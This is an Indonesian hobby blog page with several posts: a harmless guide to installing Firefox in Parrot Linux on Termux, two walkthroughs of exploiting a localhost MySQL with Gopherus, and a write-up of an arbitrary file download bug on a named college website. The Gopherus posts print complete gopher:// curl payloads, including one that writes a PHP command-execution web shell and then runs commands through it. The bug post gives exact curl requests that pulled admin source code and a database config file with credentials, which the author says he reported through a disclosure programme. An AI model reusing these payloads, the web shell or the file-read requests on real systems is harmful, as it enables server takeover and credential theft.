No More Yukinoshita 47. I'm Done

If You Found Every Social Media Platform Using "Yukinoshita 47" Name That's The Other Guy.

Copyright © Yukinoshita 47 | Published By Gooyaabi Templates | Powered By Blogger
Design by WebSuccessAgency | Blogger Theme by NewBloggerThemes.com | BTheme.net

My Motivation

My Motivation

Blog Archive



Seal

Always Trust Yourself And Use Your Opportunity



Jumat, 31 Mei 2019

Android : Install Firefox Di Parrot Linux Termux


Halo gaes kembali lagi dengan gw Yukinoshita 47 kali ini lagi membuat tutorial sederhana yaitu Install Firefox Di Parrot Linux Termux

Sebelum nya pastikan android lu sudah terinstall Parrot Linux Lengkap dengan Desktop Environment nya di Termux nya kalo belum bisa ngikuti langkah2 sebelum nya

  1. Install Parrot Linux via Termux
  2. Install Desktop Environment

Nah jika sudah kita mulai aja

Pertama buka termux


Selanjutnya jalankan parrot linux dengan perintah

./start-parrot.sh

Kemudian tekan enter


Kemudian jalankan vnc server dengan perintah

vncserver-start

Kemudian tekan enter 


Buka VNC Viewer kemudian buka Session Parrot Linux yang tersedia sebelum nya


Kemudian buka Application > Pilih Terminal Emulator


Install Firefox dengan perintah

apt install firefox

Kemudian tekan enter lalu tekan y kemudian tekan enter 


Kemudian biarkan proses download dan install nya hingga selesai



Kemudian jika ingin buka firefox buka menu Application > Internet > Firefox


Dan firefox bisa digunakan seperti layaknya broswer di PC wkwkwkwkwk


oke sampai disini dulu tutorial nya sekian dan terimakasih.



Kamis, 30 Mei 2019

Rabu, 29 Mei 2019

Parrot Linux : Exploitasi MySQL Dengan Gopherus 2 - Upload Shell


Halo gaes kembali lagi dengan gw yukinoshita 47 kali ini gw mau sharing Gopherus lagi ini wkwkwkwk cerita ini adalah lanjutan dari sebelum nya https://yukinoshita47.blogspot.com/2019/05/parrot-linux-exploitasi-mysql-dengan.html ya masih di localhost wkwkwkwk mungkin nanti baru gw coba versi remote nya.

oke langsung aja ya gaes pertama masuk dulu ke root dengan perintah

sudo su

kemudian tekan enter


lalu buat payload gopher nya dengan perintah

gopherus --exploit mysql

kemudian tekan enter

kemudian pada bagian

Give MySQL username (isi username mysql lu contoh): root

kemudian tekan enter

Give query to execute (isi perintah MySQL nya untuk generate shell): select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'

tekan enter lagi

dan url gopher payload nya pun muncul


kemudian eksekusi payload nya dengan perintah

curl gopher://127.0.0.1:3306/_%a3%01%85%a6%ff%01%01%21%72%6f%6f%74%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%53%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%52%45%51%55%45%53%54%5b%27%63%6d%64%27%5d%29%3b%20%3f%3e%22%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%73%68%65%6c%6c%2e%70%68%70%27%01%01 --output shell.log

kemudian tekan enter


kemudian liat output nya apakah upload shell nya berhasil atau kagak

cat shell.log

kemudian tekan enter

dan disini berhasil upload shelll sesuai perintah mysql tadi di /var/www/html/


kemudian akses dibrowser deh shell nya disini http://127.0.0.1/shell.php

cara eksekusi shell nya contoh http://127.0.0.1/shell.php?cmd=id 

dan output nya keliatan seperti gambar dibawah ini


via terminal juga bisa kok dengan perintah curl contoh

curl http://127.0.0.1/shell.php?cmd=id

kemudian tekan enter

dan voila



oke sampai disini aja tutorial unfaedah ini ntar gw share lagi kalo gw dapat metode lainnya.


Selasa, 28 Mei 2019

Parrot Linux : Exploitasi MySQL Dengan Gopherus


oke gaes kembali lagi dengan gw Yukinoshita 47 kali ini gw mau share experimen unfaedah gw yaitu Exploitasi MySQL Dengan Gopherus ya lebih tepat nya di localhost wkwkwkkw gw disini coba exploitasi MySQL aja karena tumbal yang memadai saat ini hanya mysql :v

karena pas gw googling di forum heker ada gw nemu gopherus gopherusan cuma gajelas info nya wkwkwkk makanya gw coba-coba sendiri aja dulu.

menurut yg gw pelajari ini exploitasi menggunakan metode Gopher protocol 

Gopher adalah protokol layer aplikasi TCP/IP yang dirancang untuk distribusi, pencarian, dan pengambilan dokumen melalui Internet. Sangat berorientasi pada desain dokumen menu, protokol Gopher disajikan menarik untuk alternatif World Wide Web pada tahap awalnya, tetapi akhirnya gagal mencapai popularitas.  

Protokol ini menawarkan beberapa fitur yang tidak didukung oleh native Web dan menerapkan hierarki yang lebih kuat pada informasi yang tersimpan di dalamnya. Menu teks antarmuka yang mudah digunakan, dan cocok untuk lingkungan komputasi yang sangat bergantung pada remot teks berorientasi terminal komputer, yang masih umum pada saat pembentukannya pada tahun 1991, dan kesederhanaan protokol yang difasilitasi berbagai implementasi klien. Revisi gopher yang lebih baru dan klien grafis menambahkan dukungan untuk multimedia.

Dengan struktur hierarki, Gopher memberikan platform berguna untuk skala besar koneksi perpustakaan elektronik pertama. Pengguna Gopher ingat bahwa sistem "lebih cepat dan lebih efisien dan jauh lebih terorganisir" dari layanan Web saat ini. Meskipun sebagian besar digantikan oleh Web pada tahun berikutnya, protokol Gopher masih digunakan oleh penggemar, dan server populasi kecil tetap aktif dipertahankan.

oke langsung aja masuk sebagai root dulu gaes dengan perintah

sudo su

kemudian tekan enter lalu input password seperti biasa nya dan tekan enter


biase karena tools pihak ketiga gw berada di /opt/pentest jadi gw masuk ke direktori dulu dengan perintah

cd /opt/pentest

kemudian tekan enter jika lu ikuti tutor ini dan belum ada folder pentest di opt ya buat aja dulu dengan perintah mkdir /opt/pentest kemudian tekan enter


pertama download tools nya dengan perintah

git clone https://github.com/tarunkant/Gopherus

kemudian tekan enter dan tunggu hingga selesai


masuk ke direktori nya dengan perintah

cd Gopherus

kemudian tekan enter


install gopherus dengan perintah

./install.sh

kemudian tekan enter


gimana cara jalanin tools nya bisa langsung dengan perintah gopherus diterminal atau di dalam direktori Gopherus nya bisa juga lu jalanin dengan perintah python gopherus.py



untuk lihat informasi tools gopherus ini perintah nya

python gopherus.py -h

kemudian tekan enter



disini gw mau contohin exploitasi Mysql untuk lihat database, tabel, dan kolom nya aja ya wkwkwk

pertama buat dulu payload nya dengan perintah

python gopherus.py --exploit mysql

kemudian tekan enter

Give MySQL username nya isi username mysql lu contoh : root

kemudian tekan enter

Give query to execute ini adalah query perintah di mariaDB/Mysql contoh : show databases;

kemudian tekan enter dan muncul lah payload nya dalam bentuk protokol gopher


oke langsung aja coba eksekusi pake curl dengan perintah

curl -v gopher://127.0.0.1:3306/_%a3%01%85%a6%ff%01%01%21%72%6f%6f%74%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%10%03%73%68%6f%77%20%64%61%74%61%62%61%73%65%73%3b%01%01 --output gopher.log

kemudian tekan enter


liat hasil nya dengan perintah

cat gopher.log

kemudian tekan enter dan hasil nya emang berantakan gini kntl gw juga bingung ini karena belajar otodidak wkwkwkwkwk

disini gw bisa liat database nya adalah

dvwa
information_schema
mysql
performance_schema
phpmyadmin   


biase buat lagi dah payload buat liat tabel nya disini gw mau intip isi tabel dari database phpmyadmin

python gopherus.py --exploit mysql

kemudian tekan enter

Give MySQL username nya isi username mysql lu contoh : root

kemudian tekan enter

Give query to execute ini adalah query perintah di mariaDB/Mysql contoh : use phpmyadmin; show tables;

kemudian tekan enter dan muncul lah payload nya dalam bentuk protokol gopher seperti tadi


lanjut mari kita eksekusi payload nya dengan perintah

curl -v gopher://127.0.0.1:3306/_%a3%01%85%a6%ff%01%01%21%72%6f%6f%74%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1d%03%75%73%65%20%70%68%70%6d%79%61%64%6d%69%6e%3b%20%73%68%6f%77%20%74%61%62%6c%65%73%3b%01%01 --output gopher1.log 

kemudian tekan enter


mari kita intip output nya dengan perintah

cat gopher1.log 

kemudian tekan enter dan hasil nya jg amburadul bngst tp gw bisa baca output nya hasil nya adalah

pma__bookmark
pma__central_columns
pma__column_inf
pma__designer_settings   
pma__export_templates
pma__favorite
pma__history
pma__pdf_pagesa__navigationhiding
pma__trackingpma__userconfig
pma__usergroupsoords
pma__table_info
pma__table_uiprefs
pma__users



lanjut gw mau intip pma__users ya biase bikin lagi payload nya dengan perintah

python gopherus.py --exploit mysql

kemudian tekan enter

Give MySQL username nya isi username mysql lu contoh : root

kemudian tekan enter

Give query to execute ini adalah query perintah di mariaDB/Mysql contoh : use phpmyadmin; describe pma__users;

kemudian tekan enter dan muncul lah payload nya dalam bentuk protokol gopher lagi wkwkwkwk.



seperti biasa eksekusi dong payload nya dengan perintah

curl -v gopher://127.0.0.1:3306/_%a3%01%85%a6%ff%01%01%21%72%6f%6f%74%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%25%03%75%73%65%20%70%68%70%6d%79%61%64%6d%69%6e%3b%20%64%65%73%63%72%69%62%65%20%70%6d%61%5f%5f%75%73%65%72%73%3b%01%01 --output gopher2.log

kemudian tekan enter


oke mari intip output nya kali ini juga berantakan wkwkwkwk tp gw bisa baca kok isi nya dari tabel pma__users dengan perintah

cat gopher2.log

username
usergroup


intinya pada bagian Give query to execute adalah perintah MariaDB atau MySQL aja gw cuma bisa contohin sampai disini aja nanti kalo gw dapet metode lain gopherus ini ya gw buatin kok artikel nya wkwkwkwk

oke cukup sampai disini aja sekian dan terimaksih



Bug Hunting : Sensitive Arbitrary File Download www.agcbosecollege.org - NCIIPC RVDP

Ok gaes kali ini gw mau sharing segmen baru yaitu Bug Hunting ya gw sebenarnya bukan pengikut kaum bug hunter sih yang main nya di HackerOne, Redstorm dan kawan-kawan nya karena gw masih belajar jadi gak pede ikutan gituan  :v  

dan kebetulan sekali karena aktivitas bug hunting ini gw kenal dengan lembaga cyber india namanya NCIIPC (National Critical Information Infrastructure Protection Centre) gw mikirnya gini kalo nemu site indo berarti lapornya ke BSSN karena ini site india ya gw lapor nya ke NCIIPC lah wkwkwkkwkw.



NCIIPC menjalankan Program Responsible Vulnerability Disclosure Program (RVDP) untuk melaporkan segala Kerentanan dalam Infrastruktur Informasi Penting yang dapat menyebabkan akses, modifikasi, penggunaan, pengungkapan, gangguan, ketidakmampuan, ketidakmampuan, atau gangguan yang sama.
Dengan melaporkan kerentanan di Sektor Kritis, kita menjadi bagian dari keluarga besar NCIIPC. NCIIPC akan mengakui kontribusi kita dengan tepat.

sisanya bisa lu baca disini : http://www.nciipc.gov.in/RVDP.html 

nah kali ini gw iseng nemu bug di web nya di https://www.agcbosecollege.org/ karena bug nya udah di patch yaudah langsung aja gw rilis artikel nya dan ini penampakan web nya.


gw iseng download file di web nya nah karena di url nya begini 



https://www.agcbosecollege.org/?file=/home1/sysconin/public_html/agcbosecollege/attachment/1 

bagian ini  
?file=/home1/sysconin/public_html/agcbosecollege/attachment/1  

membuat gw tertarik untuk mencoba menelusuri lebih dalam lagi dan gw coba untuk mendownload admin page nya dengan perintah

curl https://www.agcbosecollege.org/?file=/home1/sysconin/public_html/agcbosecollege/admin/index.php

kemudian tekan enter dan source code php nya pun muncul wkwkwkkw


selanjutnya gw coba intip lagi pada bagian admin_utils.php dengan perintah

curl https://www.agcbosecollege.org/?file=/home1/sysconin/public_html/agcbosecollege/admin/admin_utils.php

kemudian tekan enter dan berhasil keliatan dimana lokasi config database nya 


dan gw langsung intip config database nya

curl https://www.agcbosecollege.org/?file=/home1/sysconin/public_html/agcbosecollege/admin/includes/config.php

kemudian tekan enter dan keliatan deh db_name nya, db_user, db_pass nya, dan db_host juga wkwkwkwkwk. 


Dan sampai disini gw cari bug lain tp gak nemu yaudah gw lapor langsung ke NCIIPC gw kirim email file pdf dan bukti pendukung ke admin web dan NCIIPC rvdp@nciipc.gov.in



setelah bilang makasih trus ngilang gak ada kabar dan gak ada angin gak ada hujan NCIIPC email gw untuk ngisi form buat update database mereka sebagai NCIIPC cyber security researcher dan security professional. 

gw sendiri gak tau apa maksudnya ya mungkin aja ada sesuatu yang menarik nanti di kemudian hari wkwkwkwkwk.


Timeline
- 26 April 01:00 AM [Found Bug]

- 26 April 02:16 AM [Reporting]

- 26 April 10:27 AM [NCIIPC Say Thanks]

- Unconfirmed Date And Time [ Bug Fixed ]

- 22 May 13:39 PM [NCIIPC Asking Me For Name, Profession, Email ID, Mobile Number, And Location For Updating Database of NCIIPC Cyber Security Researcher And Security Professional ]

- Reward ?? [I Can't Confirm]

oke cukup sampai disini aja ya sekian dan terimakasih